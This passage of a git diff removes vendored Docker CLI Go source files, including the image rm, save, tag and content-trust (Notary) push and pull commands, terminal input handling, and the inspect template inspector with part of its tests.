-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type removeOptions struct {
-	force   bool
-	noPrune bool
-}
-
-// NewRemoveCommand creates a new `docker remove` command
-func NewRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts removeOptions
-
-	cmd := &cobra.Command{
-		Use:   "rmi [OPTIONS] IMAGE [IMAGE...]",
-		Short: "Remove one or more images",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runRemove(dockerCli, opts, args)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force removal of the image")
-	flags.BoolVar(&opts.noPrune, "no-prune", false, "Do not delete untagged parents")
-
-	return cmd
-}
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := *NewRemoveCommand(dockerCli)
-	cmd.Aliases = []string{"rmi", "remove"}
-	cmd.Use = "rm [OPTIONS] IMAGE [IMAGE...]"
-	return &cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, opts removeOptions, images []string) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	options := types.ImageRemoveOptions{
-		Force:         opts.force,
-		PruneChildren: !opts.noPrune,
-	}
-
-	var errs []string
-	for _, image := range images {
-		dels, err := client.ImageRemove(ctx, image, options)
-		if err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			for _, del := range dels {
-				if del.Deleted != "" {
-					fmt.Fprintf(dockerCli.Out(), "Deleted: %s\n", del.Deleted)
-				} else {
-					fmt.Fprintf(dockerCli.Out(), "Untagged: %s\n", del.Untagged)
-				}
-			}
-		}
-	}
-
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/save.go b/vendor/github.com/docker/docker/cli/command/image/save.go
deleted file mode 100644
index bbe82d2a05..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/save.go
+++ /dev/null
@@ -1,57 +0,0 @@
-package image
-
-import (
-	"errors"
-	"io"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type saveOptions struct {
-	images []string
-	output string
-}
-
-// NewSaveCommand creates a new `docker save` command
-func NewSaveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts saveOptions
-
-	cmd := &cobra.Command{
-		Use:   "save [OPTIONS] IMAGE [IMAGE...]",
-		Short: "Save one or more images to a tar archive (streamed to STDOUT by default)",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.images = args
-			return runSave(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT")
-
-	return cmd
-}
-
-func runSave(dockerCli *command.DockerCli, opts saveOptions) error {
-	if opts.output == "" && dockerCli.Out().IsTerminal() {
-		return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.")
-	}
-
-	responseBody, err := dockerCli.Client().ImageSave(context.Background(), opts.images)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	if opts.output == "" {
-		_, err := io.Copy(dockerCli.Out(), responseBody)
-		return err
-	}
-
-	return command.CopyToFile(opts.output, responseBody)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/tag.go b/vendor/github.com/docker/docker/cli/command/image/tag.go
deleted file mode 100644
index fb2b703856..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/tag.go
+++ /dev/null
@@ -1,41 +0,0 @@
-package image
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type tagOptions struct {
-	image string
-	name  string
-}
-
-// NewTagCommand creates a new `docker tag` command
-func NewTagCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts tagOptions
-
-	cmd := &cobra.Command{
-		Use:   "tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]",
-		Short: "Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE",
-		Args:  cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.image = args[0]
-			opts.name = args[1]
-			return runTag(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.SetInterspersed(false)
-
-	return cmd
-}
-
-func runTag(dockerCli *command.DockerCli, opts tagOptions) error {
-	ctx := context.Background()
-
-	return dockerCli.Client().ImageTag(ctx, opts.image, opts.name)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/trust.go b/vendor/github.com/docker/docker/cli/command/image/trust.go
deleted file mode 100644
index 5136a22156..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/trust.go
+++ /dev/null
@@ -1,381 +0,0 @@
-package image
-
-import (
-	"encoding/hex"
-	"encoding/json"
-	"errors"
-	"fmt"
-	"io"
-	"path"
-	"sort"
-
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/trust"
-	"github.com/docker/docker/distribution"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	"github.com/docker/notary/client"
-	"github.com/docker/notary/tuf/data"
-)
-
-type target struct {
-	name   string
-	digest digest.Digest
-	size   int64
-}
-
-// trustedPush handles content trust pushing of an image
-func trustedPush(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error {
-	responseBody, err := imagePushPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege)
-	if err != nil {
-		return err
-	}
-
-	defer responseBody.Close()
-
-	return PushTrustedReference(cli, repoInfo, ref, authConfig, responseBody)
-}
-
-// PushTrustedReference pushes a canonical reference to the trust server.
-func PushTrustedReference(cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, in io.Reader) error {
-	// If it is a trusted push we would like to find the target entry which match the
-	// tag provided in the function and then do an AddTarget later.
-	target := &client.Target{}
-	// Count the times of calling for handleTarget,
-	// if it is called more that once, that should be considered an error in a trusted push.
-	cnt := 0
-	handleTarget := func(aux *json.RawMessage) {
-		cnt++
-		if cnt > 1 {
-			// handleTarget should only be called one. This will be treated as an error.
-			return
-		}
-
-		var pushResult distribution.PushResult
-		err := json.Unmarshal(*aux, &pushResult)
-		if err == nil && pushResult.Tag != "" && pushResult.Digest.Validate() == nil {
-			h, err := hex.DecodeString(pushResult.Digest.Hex())
-			if err != nil {
-				target = nil
-				return
-			}
-			target.Name = pushResult.Tag
-			target.Hashes = data.Hashes{string(pushResult.Digest.Algorithm()): h}
-			target.Length = int64(pushResult.Size)
-		}
-	}
-
-	var tag string
-	switch x := ref.(type) {
-	case reference.Canonical:
-		return errors.New("cannot push a digest reference")
-	case reference.NamedTagged:
-		tag = x.Tag()
-	default:
-		// We want trust signatures to always take an explicit tag,
-		// otherwise it will act as an untrusted push.
-		if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), nil); err != nil {
-			return err
-		}
-		fmt.Fprintln(cli.Out(), "No tag specified, skipping trust metadata push")
-		return nil
-	}
-
-	if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), handleTarget); err != nil {
-		return err
-	}
-
-	if cnt > 1 {
-		return fmt.Errorf("internal error: only one call to handleTarget expected")
-	}
-
-	if target == nil {
-		fmt.Fprintln(cli.Out(), "No targets found, please provide a specific tag in order to sign it")
-		return nil
-	}
-
-	fmt.Fprintln(cli.Out(), "Signing and pushing trust metadata")
-
-	repo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "push", "pull")
-	if err != nil {
-		fmt.Fprintf(cli.Out(), "Error establishing connection to notary repository: %s\n", err)
-		return err
-	}
-
-	// get the latest repository metadata so we can figure out which roles to sign
-	err = repo.Update(false)
-
-	switch err.(type) {
-	case client.ErrRepoNotInitialized, client.ErrRepositoryNotExist:
-		keys := repo.CryptoService.ListKeys(data.CanonicalRootRole)
-		var rootKeyID string
-		// always select the first root key
-		if len(keys) > 0 {
-			sort.Strings(keys)
-			rootKeyID = keys[0]
-		} else {
-			rootPublicKey, err := repo.CryptoService.Create(data.CanonicalRootRole, "", data.ECDSAKey)
-			if err != nil {
-				return err
-			}
-			rootKeyID = rootPublicKey.ID()
-		}
-
-		// Initialize the notary repository with a remotely managed snapshot key
-		if err := repo.Initialize([]string{rootKeyID}, data.CanonicalSnapshotRole); err != nil {
-			return trust.NotaryError(repoInfo.FullName(), err)
-		}
-		fmt.Fprintf(cli.Out(), "Finished initializing %q\n", repoInfo.FullName())
-		err = repo.AddTarget(target, data.CanonicalTargetsRole)
-	case nil:
-		// already initialized and we have successfully downloaded the latest metadata
-		err = addTargetToAllSignableRoles(repo, target)
-	default:
-		return trust.NotaryError(repoInfo.FullName(), err)
-	}
-
-	if err == nil {
-		err = repo.Publish()
-	}
-
-	if err != nil {
-		fmt.Fprintf(cli.Out(), "Failed to sign %q:%s - %s\n", repoInfo.FullName(), tag, err.Error())
-		return trust.NotaryError(repoInfo.FullName(), err)
-	}
-
-	fmt.Fprintf(cli.Out(), "Successfully signed %q:%s\n", repoInfo.FullName(), tag)
-	return nil
-}
-
-// Attempt to add the image target to all the top level delegation roles we can
-// (based on whether we have the signing key and whether the role's path allows
-// us to).
-// If there are no delegation roles, we add to the targets role.
-func addTargetToAllSignableRoles(repo *client.NotaryRepository, target *client.Target) error {
-	var signableRoles []string
-
-	// translate the full key names, which includes the GUN, into just the key IDs
-	allCanonicalKeyIDs := make(map[string]struct{})
-	for fullKeyID := range repo.CryptoService.ListAllKeys() {
-		allCanonicalKeyIDs[path.Base(fullKeyID)] = struct{}{}
-	}
-
-	allDelegationRoles, err := repo.GetDelegationRoles()
-	if err != nil {
-		return err
-	}
-
-	// if there are no delegation roles, then just try to sign it into the targets role
-	if len(allDelegationRoles) == 0 {
-		return repo.AddTarget(target, data.CanonicalTargetsRole)
-	}
-
-	// there are delegation roles, find every delegation role we have a key for, and
-	// attempt to sign into into all those roles.
-	for _, delegationRole := range allDelegationRoles {
-		// We do not support signing any delegation role that isn't a direct child of the targets role.
-		// Also don't bother checking the keys if we can't add the target
-		// to this role due to path restrictions
-		if path.Dir(delegationRole.Name) != data.CanonicalTargetsRole || !delegationRole.CheckPaths(target.Name) {
-			continue
-		}
-
-		for _, canonicalKeyID := range delegationRole.KeyIDs {
-			if _, ok := allCanonicalKeyIDs[canonicalKeyID]; ok {
-				signableRoles = append(signableRoles, delegationRole.Name)
-				break
-			}
-		}
-	}
-
-	if len(signableRoles) == 0 {
-		return fmt.Errorf("no valid signing keys for delegation roles")
-	}
-
-	return repo.AddTarget(target, signableRoles...)
-}
-
-// imagePushPrivileged push the image
-func imagePushPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc) (io.ReadCloser, error) {
-	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return nil, err
-	}
-	options := types.ImagePushOptions{
-		RegistryAuth:  encodedAuth,
-		PrivilegeFunc: requestPrivilege,
-	}
-
-	return cli.Client().ImagePush(ctx, ref, options)
-}
-
-// trustedPull handles content trust pulling of an image
-func trustedPull(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error {
-	var refs []target
-
-	notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull")
-	if err != nil {
-		fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err)
-		return err
-	}
-
-	if tagged, isTagged := ref.(reference.NamedTagged); !isTagged {
-		// List all targets
-		targets, err := notaryRepo.ListTargets(trust.ReleasesRole, data.CanonicalTargetsRole)
-		if err != nil {
-			return trust.NotaryError(repoInfo.FullName(), err)
-		}
-		for _, tgt := range targets {
-			t, err := convertTarget(tgt.Target)
-			if err != nil {
-				fmt.Fprintf(cli.Out(), "Skipping target for %q\n", repoInfo.Name())
-				continue
-			}
-			// Only list tags in the top level targets role or the releases delegation role - ignore
-			// all other delegation roles
-			if tgt.Role != trust.ReleasesRole && tgt.Role != data.CanonicalTargetsRole {
-				continue
-			}
-			refs = append(refs, t)
-		}
-		if len(refs) == 0 {
-			return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trusted tags for %s", repoInfo.FullName()))
-		}
-	} else {
-		t, err := notaryRepo.GetTargetByName(tagged.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole)
-		if err != nil {
-			return trust.NotaryError(repoInfo.FullName(), err)
-		}
-		// Only get the tag if it's in the top level targets role or the releases delegation role
-		// ignore it if it's in any other delegation roles
-		if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole {
-			return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", tagged.Tag()))
-		}
-
-		logrus.Debugf("retrieving target for %s role\n", t.Role)
-		r, err := convertTarget(t.Target)
-		if err != nil {
-			return err
-
-		}
-		refs = append(refs, r)
-	}
-
-	for i, r := range refs {
-		displayTag := r.name
-		if displayTag != "" {
-			displayTag = ":" + displayTag
-		}
-		fmt.Fprintf(cli.Out(), "Pull (%d of %d): %s%s@%s\n", i+1, len(refs), repoInfo.Name(), displayTag, r.digest)
-
-		ref, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest)
-		if err != nil {
-			return err
-		}
-		if err := imagePullPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege, false); err != nil {
-			return err
-		}
-
-		tagged, err := reference.WithTag(repoInfo, r.name)
-		if err != nil {
-			return err
-		}
-		trustedRef, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest)
-		if err != nil {
-			return err
-		}
-		if err := TagTrusted(ctx, cli, trustedRef, tagged); err != nil {
-			return err
-		}
-	}
-	return nil
-}
-
-// imagePullPrivileged pulls the image and displays it to the output
-func imagePullPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc, all bool) error {
-
-	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return err
-	}
-	options := types.ImagePullOptions{
-		RegistryAuth:  encodedAuth,
-		PrivilegeFunc: requestPrivilege,
-		All:           all,
-	}
-
-	responseBody, err := cli.Client().ImagePull(ctx, ref, options)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	return jsonmessage.DisplayJSONMessagesToStream(responseBody, cli.Out(), nil)
-}
-
-// TrustedReference returns the canonical trusted reference for an image reference
-func TrustedReference(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged, rs registry.Service) (reference.Canonical, error) {
-	var (
-		repoInfo *registry.RepositoryInfo
-		err      error
-	)
-	if rs != nil {
-		repoInfo, err = rs.ResolveRepository(ref)
-	} else {
-		repoInfo, err = registry.ParseRepositoryInfo(ref)
-	}
-	if err != nil {
-		return nil, err
-	}
-
-	// Resolve the Auth config relevant for this server
-	authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index)
-
-	notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull")
-	if err != nil {
-		fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err)
-		return nil, err
-	}
-
-	t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole)
-	if err != nil {
-		return nil, trust.NotaryError(repoInfo.FullName(), err)
-	}
-	// Only list tags in the top level targets role or the releases delegation role - ignore
-	// all other delegation roles
-	if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole {
-		return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.Tag()))
-	}
-	r, err := convertTarget(t.Target)
-	if err != nil {
-		return nil, err
-
-	}
-
-	return reference.WithDigest(reference.TrimNamed(ref), r.digest)
-}
-
-func convertTarget(t client.Target) (target, error) {
-	h, ok := t.Hashes["sha256"]
-	if !ok {
-		return target{}, errors.New("no valid hash, expecting sha256")
-	}
-	return target{
-		name:   t.Name,
-		digest: digest.NewDigestFromHex("sha256", hex.EncodeToString(h)),
-		size:   t.Length,
-	}, nil
-}
-
-// TagTrusted tags a trusted ref
-func TagTrusted(ctx context.Context, cli *command.DockerCli, trustedRef reference.Canonical, ref reference.NamedTagged) error {
-	fmt.Fprintf(cli.Out(), "Tagging %s as %s\n", trustedRef.String(), ref.String())
-
-	return cli.Client().ImageTag(ctx, trustedRef.String(), ref.String())
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/trust_test.go b/vendor/github.com/docker/docker/cli/command/image/trust_test.go
deleted file mode 100644
index 78146465e6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/trust_test.go
+++ /dev/null
@@ -1,57 +0,0 @@
-package image
-
-import (
-	"os"
-	"testing"
-
-	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/cli/trust"
-	"github.com/docker/docker/registry"
-)
-
-func unsetENV() {
-	os.Unsetenv("DOCKER_CONTENT_TRUST")
-	os.Unsetenv("DOCKER_CONTENT_TRUST_SERVER")
-}
-
-func TestENVTrustServer(t *testing.T) {
-	defer unsetENV()
-	indexInfo := &registrytypes.IndexInfo{Name: "testserver"}
-	if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "https://notary-test.com:5000"); err != nil {
-		t.Fatal("Failed to set ENV variable")
-	}
-	output, err := trust.Server(indexInfo)
-	expectedStr := "https://notary-test.com:5000"
-	if err != nil || output != expectedStr {
-		t.Fatalf("Expected server to be %s, got %s", expectedStr, output)
-	}
-}
-
-func TestHTTPENVTrustServer(t *testing.T) {
-	defer unsetENV()
-	indexInfo := &registrytypes.IndexInfo{Name: "testserver"}
-	if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "http://notary-test.com:5000"); err != nil {
-		t.Fatal("Failed to set ENV variable")
-	}
-	_, err := trust.Server(indexInfo)
-	if err == nil {
-		t.Fatal("Expected error with invalid scheme")
-	}
-}
-
-func TestOfficialTrustServer(t *testing.T) {
-	indexInfo := &registrytypes.IndexInfo{Name: "testserver", Official: true}
-	output, err := trust.Server(indexInfo)
-	if err != nil || output != registry.NotaryServer {
-		t.Fatalf("Expected server to be %s, got %s", registry.NotaryServer, output)
-	}
-}
-
-func TestNonOfficialTrustServer(t *testing.T) {
-	indexInfo := &registrytypes.IndexInfo{Name: "testserver", Official: false}
-	output, err := trust.Server(indexInfo)
-	expectedStr := "https://" + indexInfo.Name
-	if err != nil || output != expectedStr {
-		t.Fatalf("Expected server to be %s, got %s", expectedStr, output)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/in.go b/vendor/github.com/docker/docker/cli/command/in.go
deleted file mode 100644
index 7204b7ad04..0000000000
--- a/vendor/github.com/docker/docker/cli/command/in.go
+++ /dev/null
@@ -1,75 +0,0 @@
-package command
-
-import (
-	"errors"
-	"io"
-	"os"
-	"runtime"
-
-	"github.com/docker/docker/pkg/term"
-)
-
-// InStream is an input stream used by the DockerCli to read user input
-type InStream struct {
-	in         io.ReadCloser
-	fd         uintptr
-	isTerminal bool
-	state      *term.State
-}
-
-func (i *InStream) Read(p []byte) (int, error) {
-	return i.in.Read(p)
-}
-
-// Close implements the Closer interface
-func (i *InStream) Close() error {
-	return i.in.Close()
-}
-
-// FD returns the file descriptor number for this stream
-func (i *InStream) FD() uintptr {
-	return i.fd
-}
-
-// IsTerminal returns true if this stream is connected to a terminal
-func (i *InStream) IsTerminal() bool {
-	return i.isTerminal
-}
-
-// SetRawTerminal sets raw mode on the input terminal
-func (i *InStream) SetRawTerminal() (err error) {
-	if os.Getenv("NORAW") != "" || !i.isTerminal {
-		return nil
-	}
-	i.state, err = term.SetRawTerminal(i.fd)
-	return err
-}
-
-// RestoreTerminal restores normal mode to the terminal
-func (i *InStream) RestoreTerminal() {
-	if i.state != nil {
-		term.RestoreTerminal(i.fd, i.state)
-	}
-}
-
-// CheckTty checks if we are trying to attach to a container tty
-// from a non-tty client input stream, and if so, returns an error.
-func (i *InStream) CheckTty(attachStdin, ttyMode bool) error {
-	// In order to attach to a container tty, input stream for the client must
-	// be a tty itself: redirecting or piping the client standard input is
-	// incompatible with `docker run -t`, `docker exec -t` or `docker attach`.
-	if ttyMode && attachStdin && !i.isTerminal {
-		eText := "the input device is not a TTY"
-		if runtime.GOOS == "windows" {
-			return errors.New(eText + ".  If you are using mintty, try prefixing the command with 'winpty'")
-		}
-		return errors.New(eText)
-	}
-	return nil
-}
-
-// NewInStream returns a new InStream object from a ReadCloser
-func NewInStream(in io.ReadCloser) *InStream {
-	fd, isTerminal := term.GetFdInfo(in)
-	return &InStream{in: in, fd: fd, isTerminal: isTerminal}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go
deleted file mode 100644
index 1d81643fb1..0000000000
--- a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go
+++ /dev/null
@@ -1,195 +0,0 @@
-package inspect
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-	"text/template"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/utils/templates"
-)
-
-// Inspector defines an interface to implement to process elements
-type Inspector interface {
-	Inspect(typedElement interface{}, rawElement []byte) error
-	Flush() error
-}
-
-// TemplateInspector uses a text template to inspect elements.
-type TemplateInspector struct {
-	outputStream io.Writer
-	buffer       *bytes.Buffer
-	tmpl         *template.Template
-}
-
-// NewTemplateInspector creates a new inspector with a template.
-func NewTemplateInspector(outputStream io.Writer, tmpl *template.Template) Inspector {
-	return &TemplateInspector{
-		outputStream: outputStream,
-		buffer:       new(bytes.Buffer),
-		tmpl:         tmpl,
-	}
-}
-
-// NewTemplateInspectorFromString creates a new TemplateInspector from a string
-// which is compiled into a template.
-func NewTemplateInspectorFromString(out io.Writer, tmplStr string) (Inspector, error) {
-	if tmplStr == "" {
-		return NewIndentedInspector(out), nil
-	}
-
-	tmpl, err := templates.Parse(tmplStr)
-	if err != nil {
-		return nil, fmt.Errorf("Template parsing error: %s", err)
-	}
-	return NewTemplateInspector(out, tmpl), nil
-}
-
-// GetRefFunc is a function which used by Inspect to fetch an object from a
-// reference
-type GetRefFunc func(ref string) (interface{}, []byte, error)
-
-// Inspect fetches objects by reference using GetRefFunc and writes the json
-// representation to the output writer.
-func Inspect(out io.Writer, references []string, tmplStr string, getRef GetRefFunc) error {
-	inspector, err := NewTemplateInspectorFromString(out, tmplStr)
-	if err != nil {
-		return cli.StatusError{StatusCode: 64, Status: err.Error()}
-	}
-
-	var inspectErr error
-	for _, ref := range references {
-		element, raw, err := getRef(ref)
-		if err != nil {
-			inspectErr = err
-			break
-		}
-
-		if err := inspector.Inspect(element, raw); err != nil {
-			inspectErr = err
-			break
-		}
-	}
-
-	if err := inspector.Flush(); err != nil {
-		logrus.Errorf("%s\n", err)
-	}
-
-	if inspectErr != nil {
-		return cli.StatusError{StatusCode: 1, Status: inspectErr.Error()}
-	}
-	return nil
-}
-
-// Inspect executes the inspect template.
-// It decodes the raw element into a map if the initial execution fails.
-// This allows docker cli to parse inspect structs injected with Swarm fields.
-func (i *TemplateInspector) Inspect(typedElement interface{}, rawElement []byte) error {
-	buffer := new(bytes.Buffer)
-	if err := i.tmpl.Execute(buffer, typedElement); err != nil {
-		if rawElement == nil {
-			return fmt.Errorf("Template parsing error: %v", err)
-		}
-		return i.tryRawInspectFallback(rawElement)
-	}
-	i.buffer.Write(buffer.Bytes())
-	i.buffer.WriteByte('\n')
-	return nil
-}
-
-// tryRawInspectFallback executes the inspect template with a raw interface.
-// This allows docker cli to parse inspect structs injected with Swarm fields.
-func (i *TemplateInspector) tryRawInspectFallback(rawElement []byte) error {
-	var raw interface{}
-	buffer := new(bytes.Buffer)
-	rdr := bytes.NewReader(rawElement)
-	dec := json.NewDecoder(rdr)
-
-	if rawErr := dec.Decode(&raw); rawErr != nil {
-		return fmt.Errorf("unable to read inspect data: %v", rawErr)
-	}
-
-	tmplMissingKey := i.tmpl.Option("missingkey=error")
-	if rawErr := tmplMissingKey.Execute(buffer, raw); rawErr != nil {
-		return fmt.Errorf("Template parsing error: %v", rawErr)
-	}
-
-	i.buffer.Write(buffer.Bytes())
-	i.buffer.WriteByte('\n')
-	return nil
-}
-
-// Flush writes the result of inspecting all elements into the output stream.
-func (i *TemplateInspector) Flush() error {
-	if i.buffer.Len() == 0 {
-		_, err := io.WriteString(i.outputStream, "\n")
-		return err
-	}
-	_, err := io.Copy(i.outputStream, i.buffer)
-	return err
-}
-
-// IndentedInspector uses a buffer to stop the indented representation of an element.
-type IndentedInspector struct {
-	outputStream io.Writer
-	elements     []interface{}
-	rawElements  [][]byte
-}
-
-// NewIndentedInspector generates a new IndentedInspector.
-func NewIndentedInspector(outputStream io.Writer) Inspector {
-	return &IndentedInspector{
-		outputStream: outputStream,
-	}
-}
-
-// Inspect writes the raw element with an indented json format.
-func (i *IndentedInspector) Inspect(typedElement interface{}, rawElement []byte) error {
-	if rawElement != nil {
-		i.rawElements = append(i.rawElements, rawElement)
-	} else {
-		i.elements = append(i.elements, typedElement)
-	}
-	return nil
-}
-
-// Flush writes the result of inspecting all elements into the output stream.
-func (i *IndentedInspector) Flush() error {
-	if len(i.elements) == 0 && len(i.rawElements) == 0 {
-		_, err := io.WriteString(i.outputStream, "[]\n")
-		return err
-	}
-
-	var buffer io.Reader
-	if len(i.rawElements) > 0 {
-		bytesBuffer := new(bytes.Buffer)
-		bytesBuffer.WriteString("[")
-		for idx, r := range i.rawElements {
-			bytesBuffer.Write(r)
-			if idx < len(i.rawElements)-1 {
-				bytesBuffer.WriteString(",")
-			}
-		}
-		bytesBuffer.WriteString("]")
-		indented := new(bytes.Buffer)
-		if err := json.Indent(indented, bytesBuffer.Bytes(), "", "    "); err != nil {
-			return err
-		}
-		buffer = indented
-	} else {
-		b, err := json.MarshalIndent(i.elements, "", "    ")
-		if err != nil {
-			return err
-		}
-		buffer = bytes.NewReader(b)
-	}
-
-	if _, err := io.Copy(i.outputStream, buffer); err != nil {
-		return err
-	}
-	_, err := io.WriteString(i.outputStream, "\n")
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go
deleted file mode 100644
index 1ce1593ab7..0000000000
--- a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go
+++ /dev/null
@@ -1,221 +0,0 @@
-package inspect
-
-import (
-	"bytes"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/utils/templates"
-)
-
-type testElement struct {
-	DNS string `json:"Dns"`
-}
-
-func TestTemplateInspectorDefault(t *testing.T) {
-	b := new(bytes.Buffer)
-	tmpl, err := templates.Parse("{{.DNS}}")
-	if err != nil {
-		t.Fatal(err)
-	}
-	i := NewTemplateInspector(b, tmpl)
-	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-	if b.String() != "0.0.0.0\n" {
-		t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String())
-	}
-}
-
-func TestTemplateInspectorEmpty(t *testing.T) {
-	b := new(bytes.Buffer)
-	tmpl, err := templates.Parse("{{.DNS}}")
-	if err != nil {
-		t.Fatal(err)
-	}
-	i := NewTemplateInspector(b, tmpl)
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-	if b.String() != "\n" {
-		t.Fatalf("Expected `\\n`, got `%s`", b.String())
-	}
-}
-
-func TestTemplateInspectorTemplateError(t *testing.T) {
-	b := new(bytes.Buffer)
-	tmpl, err := templates.Parse("{{.Foo}}")
-	if err != nil {
-		t.Fatal(err)
-	}
-	i := NewTemplateInspector(b, tmpl)
-
-	err = i.Inspect(testElement{"0.0.0.0"}, nil)
-	if err == nil {
-		t.Fatal("Expected error got nil")
-	}
-
-	if !strings.HasPrefix(err.Error(), "Template parsing error") {
-		t.Fatalf("Expected template error, got %v", err)
-	}
-}
-
-func TestTemplateInspectorRawFallback(t *testing.T) {
-	b := new(bytes.Buffer)
-	tmpl, err := templates.Parse("{{.Dns}}")
-	if err != nil {
-		t.Fatal(err)
-	}
-	i := NewTemplateInspector(b, tmpl)
-	if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0"}`)); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-	if b.String() != "0.0.0.0\n" {
-		t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String())
-	}
-}
-
-func TestTemplateInspectorRawFallbackError(t *testing.T) {
-	b := new(bytes.Buffer)
-	tmpl, err := templates.Parse("{{.Dns}}")
-	if err != nil {
-		t.Fatal(err)
-	}
-	i := NewTemplateInspector(b, tmpl)
-	err = i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Foo": "0.0.0.0"}`))
-	if err == nil {
-		t.Fatal("Expected error got nil")
-	}
-
-	if !strings.HasPrefix(err.Error(), "Template parsing error") {
-		t.Fatalf("Expected template error, got %v", err)
-	}
-}
-
-func TestTemplateInspectorMultiple(t *testing.T) {
